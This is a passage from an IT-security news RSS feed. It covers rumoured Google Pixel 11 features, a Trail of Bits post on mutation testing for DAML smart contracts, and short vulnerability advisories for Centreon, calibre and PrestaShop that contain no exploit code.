<p>Obwohl die Pixel-11-Reihe von „Pixel Glow“ profitieren soll, scheint es, als wolle Google im Gegenzug etwas weglassen, nämlich den Temperatursensor. Der Temperatursensor, der ursprünglich bereits beim <a href="https://www.pcwelt.de/article/2103410/google-pixel-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pixel 8 Pro</a> eingeführt wurde, wirkte oft wie ein unausgereiftes Konzept, zumal es zum Zeitpunkt der Markteinführung keinen offensichtlichen Nutzen gab und der Eindruck entstand, dass die Technologie auf Drittanbieter angewiesen war, um ihre Existenz zu rechtfertigen. Daher stört es uns nicht sonderlich, dass er entfernt wird.</p>



<p>Schade ist jedoch, dass nach Gerüchten, wonach ein vollwertiges Äquivalent zu Apples Face ID in der Entwicklung sei und in der Pixel-11-Reihe sein Debüt feiern sollte, nun offenbar feststeht, dass diese Technologie den Markteintritt komplett verpassen und wahrscheinlich erst in den Modellen des nächsten Jahres zum Einsatz kommen wird.</p>



<p>Das Fehlen einer vollwertigen Gesichtserkennung wird die neuen Pixel-Modelle, insbesondere die höherpreisigen, gegenüber bestimmten Android-Geräten wie dem <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">Honor Magic 8 Pro</a> benachteiligen, das über einen frontseitigen 3D-Scanner verfügt, der Apples „Dynamic Island“ durchaus ähnelt.</p>



<h3 class="wp-block-heading">Pixel 11: Akku &amp; Aufladen</h3>



<p>Zwar wurden die Akku-Spezifikationen für die Pixel-11-Serie noch nicht bekannt gegeben, doch gibt es einen interessanten Hinweis, der bereits in die Gerüchteküche gelangt ist: die Möglichkeit eines austauschbaren Akkus.</p>



<p>Vor allem dank Apple und dessen Beharren auf einem einheitlichen Gehäuse haben so gut wie alle Hersteller das Konzept der austauschbaren Akkus aufgegeben, obwohl diese Funktion einst ein fester Bestandteil von Mobiltelefonen im Allgemeinen war. Einem kürzlich veröffentlichten <a href="https://hypertxt.ai/blog-images/Google-Pixel-Removable-Battery.pdf" target="_blank" rel="noreferrer noopener">Patent </a>zufolge scheint es jedoch, als würde Google darüber nachdenken, dieses Konzept wieder aufzugreifen – möglicherweise für das Pixel 11 Fold.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bb561"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/Pixel-11-Pro-Fold-Battery-Patent.png?w=1200" alt="Pixel 11 Pro Fold Removable Battery Patent" class="wp-image-3037196" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">US Patent</p></div>



<p>Da die faltbaren Pixel-Smartphones deutlich mehr Energie benötigen, um ihre größeren internen Bildschirme mit Strom zu versorgen, könnte ein schnell austauschbarer Akku für intensive Nutzer eine echte Rettung sein. Es lässt sich nicht sagen, ob Google diese Funktion auch für andere Modelle der Pixel-11-Reihe in Betracht zieht, doch wir würden uns sehr darüber freuen – insbesondere, da dies die Smartphones angesichts der nachlassenden Akkuleistung zu einer weitaus praktikableren Langzeitlösung machen würde.</p>



<p>Google könnte zudem schnellere Ladezeiten einführen und die Akkulaufzeit verbessern, um den Anforderungen der verbesserten Hardware und der KI-Funktionen gerecht zu werden.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bba15"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/Google-Pixelsnap-Charger.png?w=1200" alt="Google Pixelsnap charger" class="wp-image-2880960" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Google</p></div>



<p>Abgesehen von diesen Gerüchten besteht die größere Hoffnung, dass Google möglicherweise auch schnellere Ladezeiten einführt und die Akkulaufzeit insgesamt verbessert, um den Anforderungen der verbesserten Hardware und der KI-Funktionen gerecht zu werden.</p>



<p>Schließlich verfügt die Pixel-10-Serie über integriertes magnetisches Qi2-Laden – ähnlich wie Magsafe –, wobei das XL-Modell mit Qi2.2 eine kabellose Ladegeschwindigkeit von 25 Watt erreicht.</p>



<p>Hoffentlich werden alle Pixel-11-Smartphones den schnelleren Qi2.2-Standard sowie die kabelgebundene Ladegeschwindigkeit von 45 Watt des Pixel 10 Pro XL erhalten.</p>



<h3 class="wp-block-heading">Pixel 11: Software</h3>



<p>Es wird erwartet, dass das Software-Erlebnis der Pixel-11-Serie eng mit den neuesten KI-Entwicklungen von Google verzahnt sein wird und Funktionen bietet, die die alltägliche Interaktion mit dem Gerät vereinfachen und verbessern. Dank eines Berichts erfahren wir bereits einiges darüber.</p>



<p>Eine der erwarteten Software-Verbesserungen ist die Funktion „Speak-to-Tweak“, mit der Nutzer sprachgesteuerte Anpassungen an ihren Fotos vornehmen können. Durch das einfache Aussprechen von Befehlen können Nutzer Bildeinstellungen wie Helligkeit, Kontrast und Sättigung optimieren, wodurch die Bildbearbeitung intuitiver und zugänglicher wird.</p>



<p>Darüber hinaus könnte die Pixel-11-Serie über „Sketch-to-Image“ verfügen, ein Tool, das grobe Skizzen in detaillierte Bilder umwandelt, ähnlich wie bei Samsungs Galaxy AI. Diese Funktion dürfte besonders für kreative Nutzer nützlich sein, die aus einfachen Skizzen Kunstwerke oder visuelle Inhalte erstellen möchten.</p>



<p>Eine weitere Software-Innovation mit dem vorläufigen Namen „Magic Mirror“ soll sich Gerüchten zufolge in der Entwicklung befinden, wobei konkrete Details noch unklar sind. Diese Funktion könnte neue KI-basierte Anpassungsoptionen für Fotos oder Videos einführen und damit möglicherweise die Personalisierungs- oder Verschönerungsfunktionen innerhalb der Foto- und Videobearbeitungs-Apps des Geräts verbessern.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bbf52"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-35.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 35" class="wp-image-2454270" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Die Pixel-11-Serie könnte dank der im Tensor-G6-Chip integrierten nanoTPU-Technologie zudem mit einer Reihe von durchgehend aktiven Tools zur Gesundheitsüberwachung auf den Markt kommen. Diese Suite von ML-basierten Funktionen könnte die Erkennung von Schlafapnoe, Schnarchen und Husten sowie sogar die Sturzerkennung umfassen, was das Pixel 11 zu einem leistungsstarken Gerät für gesundheitsbewusste Nutzer macht.</p>



<p>Die Serie könnte zudem neue fitnessorientierte Funktionen wie „Running ML“ enthalten, das Läufern Echtzeit-Feedback liefert, darunter anpassbare Tempovorgaben und eine Gleichgewichtsanalyse, und den Nutzern so hilft, ihre Trainingsroutinen zu optimieren.</p>



<p>Zusätzlich zu diesen Neuerungen könnte das Pixel 11 die Unterstützung für Googles „Quick Phrases“ erweitern – eine Funktion, mit der Nutzer bestimmte Aktionen ausführen können, ohne den Google Assistant vollständig zu aktivieren.</p>



<p>Das Potenzial für verbesserte „Quick Phrases“ könnte alltägliche Aufgaben wie das Annehmen von Anrufen oder die Steuerung von Smart-Home-Geräten vereinfachen und die Smartphones der Pixel-11-Serie zu äußerst reaktionsschnellen Geräten machen, die sich nahtlos in den Alltag der Nutzer integrieren.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bc43f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro_review_12.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro review 12" class="wp-image-2457636" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Dominik Tomaszewski / Foundry</p></div>



<p>Wir wissen nun wesentlich mehr darüber, was Google mit <a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank" rel="noreferrer noopener">Android 17</a> für das gesamte Ökosystem bereithält. Dazu gehören ein starker Fokus auf die Google-KI, die Aufgaben für Sie übernimmt, sowie Funktionen, die Ihr Wohlbefinden in den Vordergrund stellen, wie „Pause Point“. Smartphones von Google und Samsung werden als erste von der aktualisierten Software profitieren, sodass Fans davon ausgehen können, Android 17 mit der Pixel-11-Reihe direkt nach dem Auspacken nutzen zu können.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-4 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF4"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-4 POST @@--></div>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p>Das ist alles, was wir bislang über die Pixel-11-Serie wissen, doch wir werden diesen Artikel bis zur Markteinführung fortlaufend aktualisieren, sobald neue Gerüchte und Leaks bekannt werden.</p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mutation testing comes to DAML]]></title>
<description><![CDATA[In April we released Mewt, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DA...]]></description>
<link>https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</guid>
<pubDate>Wed, 08 Jul 2026 13:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In April we released <a href="https://blog.trailofbits.com/2026/04/01/mutation-testing-for-the-agentic-era/">Mewt</a>, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DAML’s authorization primitives), and runs them through your existing test suite to count how many mutants survive. If you want to try it, simply install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and use <code>mewt run</code>.</p>
<p>For a team shipping DAML to production, that count is what a passing test run is actually worth: it puts a number on how much your suite checks, whereas a green run on its own does not.</p>
<h2>Why DAML’s coverage reports lie</h2>
<p>Test coverage is the most reassuring lie in smart-contract development. Hitting 100% line coverage tells you the test runner walked the code; it does not tell you whether any test would fail if that code stopped doing what it is supposed to. We have been grading test harnesses by how many mutants they kill since at least <a href="https://blog.trailofbits.com/2019/01/23/fuzzing-an-api-with-deepstate-part-2/">2019</a>, and <a href="https://blog.trailofbits.com/2025/09/18/use-mutation-testing-to-find-the-bugs-your-tests-dont-catch/">our primer on finding the bugs your tests don’t catch</a> shows how a green suite can still miss the bug that matters.</p>
<p>DAML’s built-in coverage measures execution at the template and choice level: which templates were created and which choices were exercised over the test run. It reports whether each choice was exercised, not what happened inside it. A test that exercises a choice once and asserts nothing about the result reports that choice as covered. The report prints the same green percentage whether the test verifies the outcome or discards it.</p>
<h2>How mutation testing works</h2>
<p>Instead of asking whether your tests reached the code, mutation testing grades your tests by sabotaging that code. The engine generates mutants, copies of the code that each carry one small deliberate change: a flipped comparison, a removed branch, a dropped party. It then runs your test suite against each one. A mutant that makes the suite fail is caught; a mutant that passes every test survives. Every survivor is a change your tests let through, and each one is either harmless or a potential bug. The harmless ones are equivalent code no test could distinguish or a branch no execution reaches, and you can set those aside. The rest are a to-do list: each one is a specific test you are missing, a case your suite should check but does not, occasionally with a real bug sitting behind the gap. The primer above describes a real audit where a mutation campaign surfaced a high-severity bug that the project’s tests had missed.</p>
<h2>Mutation testing forces the unhappy path</h2>
<p>A DAML contract encodes rights and obligations between named parties: who holds what, who owes what to whom, and who must authorize each step. A party is not an anonymous address. It represents a real organization or person, and the contract is the rulebook for how those parties interact, including which of them can take which action, what each is allowed to see, and what stays private between them.</p>
<p>Authorization is how that rulebook is enforced: who may take which action. It is also easy to get wrong in ordinary ways, such as a typo in a controller clause, a missing party, an extra one left over from a refactor. Every combination type-checks, so nothing rejects it before it ships. A static analyzer can flag suspicious patterns, but it has no way to know which party should hold which authority on your contract. That knowledge lives in your specification, and for most projects, the only executable form of the specification is the test suite. Happy-path tests supply every signature the contract asks for and confirm the transaction succeeds. They never try the negative case—removing a required signature and checking that the ledger rejects the transaction—so they never actually test whether that signature was required at all. If the tests don’t encode that rule, nothing downstream can recover it. Mutation testing is what tells you whether they do.</p>
<p>A green test run tells you your tests passed today. Mutation testing asks the harder question: would your tests catch a mistake, now or after the next code change? Where the answer is no, you have found a test case worth writing.</p>
<h2>What Mewt adds for DAML</h2>
<p>Mewt parses every language it supports with a tree-sitter grammar. As of mid-2026, there is no maintained tree-sitter grammar for DAML, so we reused the upstream <code>tree-sitter-haskell</code> grammar. DAML is Haskell-shaped, but its contract constructs (<code>template</code>, <code>choice</code>, <code>controller</code>, and <code>signatory</code>) are not Haskell, and the grammar parses them as error-recovered subtrees. That matters less than it sounds. The common mutations still work on DAML’s ordinary expressions, so Mewt swaps arithmetic and comparison operators, flips Booleans, and removes branches just as it does in any other language, with only small adjustments where DAML’s surface syntax differs (DAML writes <code>/=</code> where most languages write <code>!=</code>). We got most of the value of a from-scratch grammar without building one.</p>
<p>The new engineering went into DAML’s authorization primitives, where the authorization bugs from the previous section live. Mewt adds two DAML-specific mutations:</p>
<ul>
<li>
<p><strong>Controller party swap</strong> (CPS in Mewt’s output): replace one party in a <code>controller</code> clause with another party that is in scope at that site.</p>
</li>
<li>
<p><strong>Controller party removal</strong> (CPR): drop one party from a multi-party controller list.</p>
</li>
</ul>
<p>Both target the same question: if the set of parties allowed to exercise this choice silently changed, would any test fail? They are a deliberately small starting set aimed at the bug class above, and more DAML-specific mutations are in the pipeline.</p>
<p>Driving a campaign needs no new harness. A short <code>mewt.toml</code> names the files to mutate and the test command (<code>dpm test</code> for a Daml 3 project), and <code>mewt run</code> does the rest, reporting each mutant as caught or surviving. The setup is deliberately small: trying it on your own project costs minutes, and we encourage exactly that.</p>
<h2>What a surviving mutant looks like</h2>
<p>Picture a conditional payment between a buyer and a seller: the buyer sets money aside for the goods, and paying it out to the seller requires both parties to sign off. The buyer’s signature is the delivery confirmation. In DAML, that policy is one line: the <code>controller</code> line on the <code>Release</code> choice.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">template ConditionalPayment
 with
 buyer : Party
 seller : Party
 amount : Decimal
 where
 signatory buyer
 observer seller

 choice Release : ()
 with
 paid : Decimal
 controller buyer, seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 1: A payment that requires both the buyer and the seller to approve its release</span></figcaption>
</figure>
<p>A typical happy-path test creates the payment and has both parties approve the release. The <code>actAs buyer &lt;&gt; actAs seller</code> line submits the command with both parties’ authority:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">testHappyPath : Script ()
testHappyPath = script do
 buyer &lt;- allocateParty "Buyer"
 seller &lt;- allocateParty "Seller"
 payment &lt;- submit buyer do
 createCmd ConditionalPayment with
 buyer
 seller
 amount = 100.0
 submit (actAs buyer &lt;&gt; actAs seller) do
 exerciseCmd payment Release with paid = 100.0
 pure ()</code></pre>
 <figcaption><span>Figure 2: The happy-path test. It passes, and coverage reports 100%.</span></figcaption>
</figure>
<p>The test passes, and by the usual measure the suite looks complete: running <code>dpm test</code> with coverage reporting enabled shows full coverage.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">$ dpm test --show-coverage --coverage-ignore-choice Archive
testHappyPath: ok, 0 active contracts, 2 transactions.
- Internal templates: 1 defined, 1 (100.0%) created
- Internal template choices: 1 defined, 1 (100.0%) exercised</code></pre>
 <figcaption><span>Figure 3: The coverage report for the happy-path test. Every template is created and every choice is exercised, for 100% coverage.</span></figcaption>
</figure>
<p>The <code>--coverage-ignore-choice Archive</code> flag deserves a word. Every DAML template automatically gets an implicit <code>Archive</code> choice. It is not part of the business logic under test, so we exclude it for simplicity. With it included, this one-choice template would report 50% even though the test exercises everything we wrote.</p>
<p>Run Mewt on the project and it generates seven mutants. The test suite catches three of them. Four survive. Here is one of the survivors, shown as the diff Mewt reports:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang=""> choice Release : ()
 with
 paid : Decimal
- controller buyer, seller
+ controller seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 4: The controller-removal mutant that survives the test suite</span></figcaption>
</figure>
<p>Re-run the test suite against this mutant. It still passes, and coverage still reports 100%. The contract claims releasing the buyer’s money requires both parties. The mutant lets the seller release it to themselves without the buyer ever confirming delivery. The tests report green either way. Only a test that tries the <em>forbidden</em> path, the seller acting alone, expecting the ledger to reject it, can tell the two contracts apart. No such test exists, and the mutation score says so. (The other three survivors tell the same story from different angles: the buyer-alone twin of this mutant, and two mutants that weaken the <code>paid == amount</code> check to <code>&lt;=</code> and <code>&gt;=</code>, which survive because the test only ever pays the exact amount.)</p>
<p>Step back, and this is the whole point of the exercise. Your tests are the executable specification of your code. Here the implementation changed, one required approval instead of two, and the specification did not react. That means the expected behavior was underspecified all along: whether both the buyer and the seller have to sign off, or just one of them, was never actually written down anywhere a machine could check. Every controller combination type-checks, and coverage reports 100% for all of them. The only place “both must sign” can exist in checkable form is a test that expects the weakened contract to fail, and writing that test is exactly what the surviving mutant tells you to do.</p>
<h2>Limitations and what comes next</h2>
<p>Mewt is not magic. Two limits are worth knowing before you run your first campaign: not every survivor is a real gap, and a campaign costs time. The roadmap that follows them is where we are taking the work next.</p>
<p>Equivalent mutants exist: some survivors turn out to be semantically identical to the original program, so no test could ever catch them. Few public DAML codebases on GitHub come with a full test suite, so we are glad OpenZeppelin open-sourced its <code>canton-stablecoin</code> reference implementation. Mewt generated hundreds of mutants for it. We ran the highest-priority ones through the existing test suite, and seven of those survived. Three were equivalent mutants or sat behind a guard that no path reaches, and the other four were genuine missing test cases. None of the survivors we reviewed pointed to a bug. Such a clean result is what you want when you run Mewt on your own code, and triaging them took minutes.</p>
<p>One of those equivalent mutants shows what that means concretely. A helper computed accrued debt:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">accrueDebt currentDebt lastAccrual now annualRate =
 if currentDebt == 0.0 || annualRate == 0.0 then currentDebt
 else
 let elapsedYears = ... -- elapsed time as a fraction of a year
 in currentDebt * (1.0 + annualRate * elapsedYears)</code></pre>
 <figcaption><span>Figure 5: The accrueDebt helper. Its first-line guard is a shortcut that returns the same value the calculation already produces.</span></figcaption>
</figure>
<p>Mewt forced the <code>if</code> to always take the <code>else</code> branch. No test failed, and none ever could: when the debt is zero, the formula multiplies by zero and returns zero, and when the rate is zero, it multiplies the debt by one and returns it unchanged. The guard is a shortcut that returns the value the formula already produces, so removing it changes nothing. Mewt suppresses the equivalent mutants it can detect. The rest need a reviewer’s judgment to dismiss.</p>
<p>Campaigns cost time in two places. The machine part: Mewt runs your test suite once per mutant, so the wall-clock cost is roughly the number of mutants times how long one test run takes, plus a rebuild if your project needs one. That is minutes on a small codebase and hours on a large one or a slow suite, so the cadence that works is nightly or weekly rather than per-commit. The human part: someone has to look at the survivors. We are working on that front from several directions at Trail of Bits, including our <a href="https://github.com/trailofbits/skills/tree/main/plugins/mutation-testing">mutation-testing skill</a> that helps configure campaigns for your project, and <a href="https://blog.trailofbits.com/2026/04/23/trailmark-turns-code-into-graphs/">Trailmark</a> with its <code>genotoxic</code> triage skill. None of these understand DAML yet, but the direction is clear: given the right harness and tools, the time-consuming parts of a campaign can be handed to AI agents. The effort is modest and the payoff is concrete: each genuine survivor is a specific test you can write, and every test you add makes your suite enforce one more guarantee your contracts are supposed to make.</p>
<p>Also on the roadmap: choice-consumption mutations (<code>consuming</code> vs <code>nonconsuming</code>) sit cleanly on top of the controller-mutation scaffolding and target a bug class Mewt does not yet reach.</p>
<h2>Dive in</h2>
<p>Install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and <code>mewt run</code>. The quickstart in the README covers the rest. DAML works out of the box. Everything here ran on Daml 3.4 with <code>dpm</code>, but Mewt just drives whatever test command you configure, so Daml 2 projects using the <code>daml</code> assistant work the same way.</p>
<p>Mutation testing complements the rest of your security stack, the type checkers, linters, and property tests you already run, rather than replacing any of it.</p>
<p>If you’re building on Canton, we help teams with security reviews of DAML applications and with the way the code gets built: working directly with your engineers on the development process itself. <a href="https://www.trailofbits.com/contact/">Contact us</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39988 | Centreon 22.04.0 Template service_alias cross site scripting (ID 168585 / EUVD-2022-42428)]]></title>
<description><![CDATA[A vulnerability has been found in Centreon 22.04.0 and classified as problematic. This impacts an unknown function of the component Template Handler. This manipulation of the argument service_alias causes cross site scripting.

This vulnerability is handled as CVE-2022-39988. The attack can be in...]]></description>
<link>https://tsecurity.de/de/3653932/sicherheitsluecken/cve-2022-39988-centreon-22040-template-servicealias-cross-site-scripting-id-168585-euvd-2022-42428/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653932/sicherheitsluecken/cve-2022-39988-centreon-22040-template-servicealias-cross-site-scripting-id-168585-euvd-2022-42428/</guid>
<pubDate>Wed, 08 Jul 2026 12:09:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/centreon">Centreon 22.04.0</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts an unknown function of the component <em>Template Handler</em>. This manipulation of the argument <em>service_alias</em> causes cross site scripting.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2022-39988">CVE-2022-39988</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[C++: Variadische Templates mithilfe von C++20-Konzepten beschränken]]></title>
<description><![CDATA[Mit den Concepts aus C++20 kann man auch variadische Template-Parameter einschränken.]]></description>
<link>https://tsecurity.de/de/3653687/it-nachrichten/c-variadische-templates-mithilfe-von-c-20-konzepten-beschraenken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653687/it-nachrichten/c-variadische-templates-mithilfe-von-c-20-konzepten-beschraenken/</guid>
<pubDate>Wed, 08 Jul 2026 10:33:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit den Concepts aus C++20 kann man auch variadische Template-Parameter einschränken.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-53511 | kovidgoyal calibre up to 9.9.x Template Formatter exec os command injection (EUVD-2026-42102)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in kovidgoyal calibre up to 9.9.x. Affected is the function exec of the component Template Formatter. Performing a manipulation results in os command injection.

This vulnerability was named CVE-2026-53511. The attack may be initiated remotely...]]></description>
<link>https://tsecurity.de/de/3652889/sicherheitsluecken/cve-2026-53511-kovidgoyal-calibre-up-to-99x-template-formatter-exec-os-command-injection-euvd-2026-42102/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652889/sicherheitsluecken/cve-2026-53511-kovidgoyal-calibre-up-to-99x-template-formatter-exec-os-command-injection-euvd-2026-42102/</guid>
<pubDate>Wed, 08 Jul 2026 00:53:49 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/kovidgoyal:calibre">kovidgoyal calibre up to 9.9.x</a>. Affected is the function <code>exec</code> of the component <em>Template Formatter</em>. Performing a manipulation results in os command injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-53511">CVE-2026-53511</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple stored XSS via unprotected back-office template variables p2]]></title>
<description><![CDATA[An attacker who can inject data into the database either through limited back-office access or by chaining an existing vulnerability such as SQL injection can exploit unescaped variables in back-office templates to execute arbitrary JavaScript within an authenticated administrator's session.
The ...]]></description>
<link>https://tsecurity.de/de/3652668/sicherheitsluecken/multiple-stored-xss-via-unprotected-back-office-template-variables-p2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652668/sicherheitsluecken/multiple-stored-xss-via-unprotected-back-office-template-variables-p2/</guid>
<pubDate>Tue, 07 Jul 2026 21:55:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An attacker who can inject data into the database either through limited back-office access or by chaining an existing vulnerability such as SQL injection can exploit unescaped variables in back-office templates to execute arbitrary JavaScript within an authenticated administrator's session.
<br>The fix escapes HTML output across dozens of legacy Smarty (.tpl) and modern Twig (.html.twig) back-office templates, including group names, category paths, customer thread and message content, shop names, translation modules, and the admin login page. It also hardens the translation pipeline by introducing a dedicated HTMLPurifier-backed Twig extension (RawPurifiedExtension), wired through TranslationService and the Symfony service container.</p>

    <p>This vulnerability affects the following application versions:</p>
    <ul>
        
            <li>PrestaShop 1.5.6.0</li>
        
            <li>PrestaShop 1.5.6.1</li>
        
            <li>PrestaShop 1.5.6.2</li>
        
            <li>PrestaShop 1.5.6.3</li>
        
            <li>PrestaShop 1.6.0.1</li>
        
